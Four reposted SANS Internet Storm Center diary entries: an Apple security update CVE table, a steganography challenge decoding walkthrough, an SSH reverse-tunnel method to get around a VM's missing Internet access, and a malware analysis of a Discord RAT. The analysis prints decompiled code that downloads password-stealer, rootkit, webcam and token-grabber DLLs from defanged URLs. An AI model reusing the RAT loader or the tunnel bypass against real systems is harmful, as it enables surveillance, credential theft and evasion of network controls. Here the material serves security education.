This post was originally published on this site

Apple released its expected update for all its operating systems. The update, in addition to providing new features, patches 65 different vulnerabilities. Many of these vulnerabilities affect multiple operating systems within the Apple ecosystem.

Of note is CVE-2025-31200. This vulnerability is already exploited in "targeted attacks". Apple released patches for this vulnerability in mid-April for its current operating Systems (iOS 18, macOS 15, tvOS 18, and visionOS 2). This update includes patches for older versions of macOS and iPadOS/iOS.

 

iOS 18.5 and iPadOS 18.5	iPadOS 17.7.7	macOS Sequoia 15.5	macOS Sonoma 14.7.6	macOS Ventura 13.7.6	watchOS 11.5	tvOS 18.5	visionOS 2.5
CVE-2025-24097: An app may be able to read arbitrary file metadata. Affects AirDrop
	x
CVE-2025-24111: An app may be able to cause unexpected system termination. Affects Display
	x
CVE-2025-24142: An app may be able to access sensitive user data. Affects Notification Center
		x	x	x
CVE-2025-24144: An app may be able to leak sensitive kernel state. Affects Kernel
	x		x	x
CVE-2025-24155: An app may be able to disclose kernel memory. Affects WebContentFilter
			x	x
CVE-2025-24213: A type confusion issue could lead to memory corruption. Affects WebKit
x	x	x			x	x	x
CVE-2025-24220: An app may be able to read a persistent device identifier. Affects Sandbox Profiles
	x
CVE-2025-24222: Processing maliciously crafted web content may lead to an unexpected process crash. Affects BOM
		x
CVE-2025-24223: Processing maliciously crafted web content may lead to memory corruption. Affects WebKit
		x
CVE-2025-24225: Processing an email may lead to user interface spoofing. Affects Mail Addressing
x	x
CVE-2025-24258: An app may be able to gain root privileges. Affects DiskArbitration
			x	x
CVE-2025-24259: An app may be able to retrieve Safari bookmarks without an entitlement check. Affects Parental Controls
	x
CVE-2025-24274: A malicious app may be able to gain root privileges. Affects Mobile Device Service
		x	x	x
CVE-2025-30440: An app may be able to bypass ASLR. Affects Libinfo
		x	x	x
CVE-2025-30442: An app may be able to gain elevated privileges. Affects SoftwareUpdate
			x	x
CVE-2025-30443: An app may be able to access user-sensitive data. Affects Found in Apps
		x
CVE-2025-30448: An attacker may be able to turn on sharing of an iCloud folder without authentication. Affects iCloud Document Sharing
x	x		x	x			x
CVE-2025-30453: A malicious app may be able to gain root privileges. Affects DiskArbitration
			x	x
CVE-2025-31196: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents. Affects CoreGraphics
	x		x	x
CVE-2025-31200: Processing an audio stream in a maliciously crafted media file may result in code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS released before iOS 18.4.1.. Affects CoreAudio
					x
CVE-2025-31204: Processing maliciously crafted web content may lead to memory corruption. Affects WebKit
x					x	x	x
CVE-2025-31205: A malicious website may exfiltrate data cross-origin. Affects WebKit
x		x			x	x	x
CVE-2025-31206: Processing maliciously crafted web content may lead to an unexpected Safari crash. Affects WebKit
x	x	x			x	x	x
CVE-2025-31207: An app may be able to enumerate a user's installed apps. Affects FrontBoard
x
CVE-2025-31208: Parsing a file may lead to an unexpected app termination. Affects CoreAudio
x	x	x	x	x	x	x	x
CVE-2025-31209: Parsing a file may lead to disclosure of user information. Affects CoreGraphics
x	x	x	x	x	x	x	x
CVE-2025-31210: Processing web content may lead to a denial-of-service. Affects FaceTime
x	x
CVE-2025-31212: An app may be able to access sensitive user data. Affects Core Bluetooth
x		x			x	x	x
CVE-2025-31213: An app may be able to access associated usernames and websites in a user's iCloud Keychain. Affects Security
	x	x	x	x
CVE-2025-31214: An attacker in a privileged network position may be able to intercept network traffic. Affects Baseband
x
CVE-2025-31215: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x	x	x			x	x	x
CVE-2025-31217: Processing maliciously crafted web content may lead to an unexpected Safari crash. Affects WebKit
x	x	x			x	x	x
CVE-2025-31218: An app may be able to observe the hostnames of new network connections. Affects NetworkExtension
		x
CVE-2025-31219: An attacker may be able to cause unexpected system termination or corrupt kernel memory. Affects Kernel
x	x	x	x	x	x	x	x
CVE-2025-31220: A malicious app may be able to read sensitive location information. Affects Weather
	x	x	x	x
CVE-2025-31221: A remote attacker may be able to leak memory. Affects Security
x	x	x	x	x	x	x	x
CVE-2025-31222: A user may be able to elevate privileges. Affects mDNSResponder
x		x	x	x	x	x	x
CVE-2025-31224: An app may be able to bypass certain Privacy preferences. Affects Sandbox
		x	x	x
CVE-2025-31225: Call history from deleted apps may still appear in spotlight search results. Affects Call History
x
CVE-2025-31226: Processing a maliciously crafted image may lead to a denial-of-service. Affects ImageIO
x	x	x			x	x	x
CVE-2025-31227: An attacker with physical access to a device may be able to access a deleted call recording. Affects Notes
x
CVE-2025-31228: An attacker with physical access to a device may be able to access notes from the lock screen. Affects Notes
x	x
CVE-2025-31232: A sandboxed app may be able to access sensitive user data. Affects Installer
		x	x	x
CVE-2025-31233: Processing a maliciously crafted video file may lead to unexpected app termination or corrupt process memory. Affects CoreMedia
x	x	x	x	x	x	x	x
CVE-2025-31234: An attacker may be able to cause unexpected system termination or corrupt kernel memory. Affects Pro Res
x		x				x	x
CVE-2025-31235: An app may be able to cause unexpected system termination. Affects Audio
	x	x	x	x
CVE-2025-31236: An app may be able to access sensitive user data. Affects Finder
		x
CVE-2025-31237: Mounting a maliciously crafted AFP network share may lead to system termination. Affects afpfs
		x	x	x
CVE-2025-31238: Processing maliciously crafted web content may lead to memory corruption. Affects WebKit
x		x			x	x	x
CVE-2025-31239: Parsing a file may lead to an unexpected app termination. Affects CoreMedia
x	x	x	x	x	x	x	x
CVE-2025-31241: A remote attacker may cause an unexpected app termination. Affects Kernel
x	x	x	x	x	x	x	x
CVE-2025-31242: An app may be able to access sensitive user data. Affects StoreKit
	x	x	x	x
CVE-2025-31244: An app may be able to break out of its sandbox. Affects quarantine
		x
CVE-2025-31245: An app may be able to cause unexpected system termination. Affects Pro Res
x	x	x	x	x		x	x
CVE-2025-31246: Connecting to a malicious AFP server may corrupt kernel memory. Affects afpfs
		x	x
CVE-2025-31247: An attacker may gain access to protected parts of the file system. Affects SharedFileList
		x	x	x
CVE-2025-31249: An app may be able to access sensitive user data. Affects Sandbox
		x
CVE-2025-31250: An app may be able to access sensitive user data. Affects TCC
		x
CVE-2025-31251: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory. Affects AppleJPEG
x	x	x	x	x	x	x	x
CVE-2025-31253: Muting the microphone during a FaceTime call may not result in audio being silenced. Affects FaceTime
x
CVE-2025-31256: Hot corner may unexpectedly reveal a user?s deleted notes. Affects Notes
		x
CVE-2025-31257: Processing maliciously crafted web content may lead to an unexpected Safari crash. Affects WebKit
x		x			x	x	x
CVE-2025-31258: An app may be able to break out of its sandbox. Affects RemoteViewServices
		x
CVE-2025-31259: An app may be able to gain elevated privileges. Affects SoftwareUpdate
		x
CVE-2025-31260: An app may be able to access sensitive user data. Affects Apple Intelligence Reports
		x

—
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

When I tried to solve "Steganography Challenge" with the same method as I used in "Steganography Analysis With pngdump.py: Bitstreams", I couldn't recover the text message.

So I looked into the source code of the encoding function EncodeNRGBA, and noticed this:

To encode each of the pixels, there are 2 nested for loops: "for x" and "for y". This means that first the column is processed (y).

While a raw bitmap is one line after the other (and not one column after the other). Thus we need to transpose the raw bitmap (rows and columns need to be swapped):

And as 8-bit RGB encoding is used for pixels, each pixel is encoded with 3 bytes, that need to be transposed correctly:

This transposition can be done with my tool translate.py and the necessary Python function. I wrote this one to do the transposition:

def Transpose(data, size, width, height):
    result = []
    for x in range(width):
        for y in range(height):
            i = y * width + x
            result.append(data[i*size:(i + 1)*size])
    return b''.join(result)

So let's decode this.

First we need the dimensions of the image:

1195 pixels wide and 642 pixels high.

With this information, I can do the transposition with translate.py (3 is the number of bytes per pixel): Transpose(data, 3, 1195, 642)

Then I use the following command to decode the size of the message. It's the same command as I used in diary entry "Steganography Analysis With pngdump.py: Bitstreams", except that this time there's an extra step (translate) to do the transposition:

pngdump.py -R -d encoded_stegosaurus.png | translate.py -f -s transpose.py "lambda data: Transpose(data, 3, 1195, 642)" | cut-bytes.py 0:32l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | format-bytes.py

The message is 547 bytes long. Let's decode this:

pngdump.py -R -d encoded_stegosaurus.png | translate.py -f -s transpose.py "lambda data: Transpose(data, 3, 1195, 642)" | cut-bytes.py 32:4376l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>"

We were able to extract the text message (a partial copy from the Wikipedia article on Stegosaurus).

But what surprised me is the lack of space characters … I though that this could hardly be due to an error in the decoding, so I took a look at the test encoder source code. Line 19 contains the message encoded as decimal bytes, and I noticed that there are no values equal to 32 (that's the space character). Decoding this line with numbers-to-string.py does indeed reveal that there are no space characters in the source code:

The solution to this challenge is identical to the one described in diary entry "Steganography Analysis With pngdump.py: Bitstreams", with one important difference: we need to transpose lines and columns.

Finally, if you would want to write this command as a one-liner without a file containing the source code for the Transpose Python function, you can to this with nested list comprehensions, but it's less readable:

pngdump.py -R -d encoded_stegosaurus.png | translate.py -f "lambda data: b''.join([b''.join([data[(y*1195+x)*3:(y*1195+x+1)*3] for y in range(642)]) for x in range(1195)])" | cut-bytes.py 32:4376l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>"

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

This quick diary is a perfect example of why I love Linux (or UNIX in general) operating system. There is always a way to "escape" settings imposed by an admin…

Disclaimer: This has been used for testing purpose in the scope of a security assessment project. Don't break your organization security policies!

To perform some assessments on a remote network, a Customer provided me a VM running Ubuntu and reachable through SSH (with IP filtering, only SSH key authentication, etc). Once logged on the system, I started to work but I was lacking of some tools and decided to install them. Bad news… The VM had no Internet access. No problem, we have an SSH access!

Let's assume the following enrivonment:

• server.acme.org is the VM. SSH listening on port 65022.
• client.sans.edu is my workstation with SSH listening on port 22.

Step 1: From client.sans.edu, connect to the server via one terminal and create a reverse tunnel ("-R" option)

ssh -p 65022 -i .ssh/privatekey -R 2222:localhost:22 xavier@server.acme.org

Step 2: Start a second session to the server, from a second terminal

ssh -p 65022 -i .ssh/privatekey xavier@server.acme.org

Step 3: From the second session, connect back to the client and setup a dynamic port forwaring ("-D")

ssh -p 2222 -D 1080 xavier@localhost

Step 4: From the fist session, create environment variables:

export http_proxy=socks5h://127.0.0.1:1080
export https_proxy=socks5h://127.0.0.1:1080
curl https://ipinfo.io/

Curl should tell you that your IP address is the one of client.sans.edu!

Now, all tools handling these variables will have access to the Interneet through your client! Slow but effective!

They are for sure many other ways to achieve this but… that's the magic of UNIX, always plenty of way to solve issues… Please share your idea or techiques!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Developers (of malware as well as goodware) don't have to reinvent the wheel all the time. Why rewrite a piece of code that was development by someone else? In the same way, all operating systems provide API calls (or system calls) to interact with the hardware (open a file, display a pixel, send a packet over the wire, etc). These system calls are grouped in libraries (example: Windows provided wininet.dll to interact with networks).

Briefly, Developers have different ways to use libraries:

• Static linking: The library is added (appended) to the user code by thelinker at compilation time.
• Dynamic loading: The library is loaded by the "loader" when the program is started and made available to the program (the well-known "DLL" files)
• On-demand loading: The Developer decides that it's now time to load an extra DLL in the program environment.

In the malware ecosystem, the third method is pretty cool because Attackers can develop "modular" malware that will expand their capabilities only when needed. Let's imagine a malware that will first perform a footprint of the victim's computer. If the victim is an administrative employee and some SAP-related files or processes are discovered by the malware, it can fetch a specific DLL from a C2 server and load it to add features targeting SAP systems. Besides the fact that the malware is smaller, the malware may look less suspicious.

Here is an example of such malware that expands its capabilities on demand. The file is a Discord RAT (SHA256:9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e)[1]. The sample is a .Net malware and can be easily decompiled. Good news, there is no obfuscation implemented and the code is pretty easy to read.

The list of "modules" or external DLLs is provided in a dictionary:

public static Dictionary<string, string> dll_url_holder = new Dictionary<string, string>
{
  { "password", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll" },
  { "rootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll" },
  { "unrootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dll" },
  { "webcam", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll" },
  { "token", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll" }
};

Let's take an example: Webcam.dll:

remnux@remnux:/MalwareZoo/20250507$ file Webcam.dll
Webcam.dll: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows

DLLs are loaded only when required by the malware. The RAT has a command "webcampic" to take a picture of the victim:

"--> !webcampic = Take a picture out of the selected webcam"

Let's review the function associated to this command:

public static async Task webcampic(string channelid)
{
    if (!dll_holder.ContainsKey("webcam"))
    {
        await LoadDll("webcam", await LinkToBytes(dll_url_holder["webcam"]));
    }
    if (!activator_holder.ContainsKey("webcam"))
    {
        activator_holder["webcam"] = Activator.CreateInstance(dll_holder["webcam"].GetType("Webcam.webcam"));
        activator_holder["webcam"].GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    }
    object obj = activator_holder["webcam"];
    obj.GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    if ((obj.GetType().GetField("cameras").GetValue(obj) as IDictionary<int, string>).Count < 1)
    {
        await Send_message(channelid, "No cameras found!");
        await Send_message(channelid, "Command executed!");
        return;
    }
    try
    {
        byte[] item = (byte[])obj.GetType().GetMethod("GetImage").Invoke(obj, new object[0]);
        await Send_attachment(channelid, "", new List<byte[]> { item }, new string[1] { "webcam.jpg" });
        await Send_message(channelid, "Command executed!");
    }
    catch
    {
        await Send_message(channelid, "Error taking picture!");
        await Send_message(channelid, "Command executed!");
    }
}

"dll_holder" is a dictionary that contains addresses of loaded DLLs:

public static async Task LoadDll(string name, byte[] data)
{
    dll_holder[name] = Assembly.Load(data);
}

In the webcam function, if the DLLS has not been loaded yet, the DLL file is fetched from the Git repository, converted into a byte array and loaded in memory. Once the DLL is loaded, the main class is used. Here is the decompiled code of Webcam.dll:

namespace Webcam
{
    public class webcam
    {
        public static Dictionary<string, bool> ready = new Dictionary<string, bool>();
        public static Dictionary<string, Bitmap> holder = new Dictionary<string, Bitmap>();
        public static Dictionary<int, string> cameras = new Dictionary<int, string>();
        public static int selected = 1;
        public static string GetWebcams()
        {
            // Code removed
        }
        public static byte[] GetImage()
        {
            // Code removed
        }
        private static void video_NewFrame(object sender, NewFrameEventArgs eventArgs, string key)
        {
            // Code removed
        }
        public static bool select(int num)
        {
            // Code removed
        }
        public static void init()
        {
            GetWebcams();
        }
    }
}

This is simple example of a "modular" malware! Happy Hunting!

[1] https://www.virustotal.com/gui/file/9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.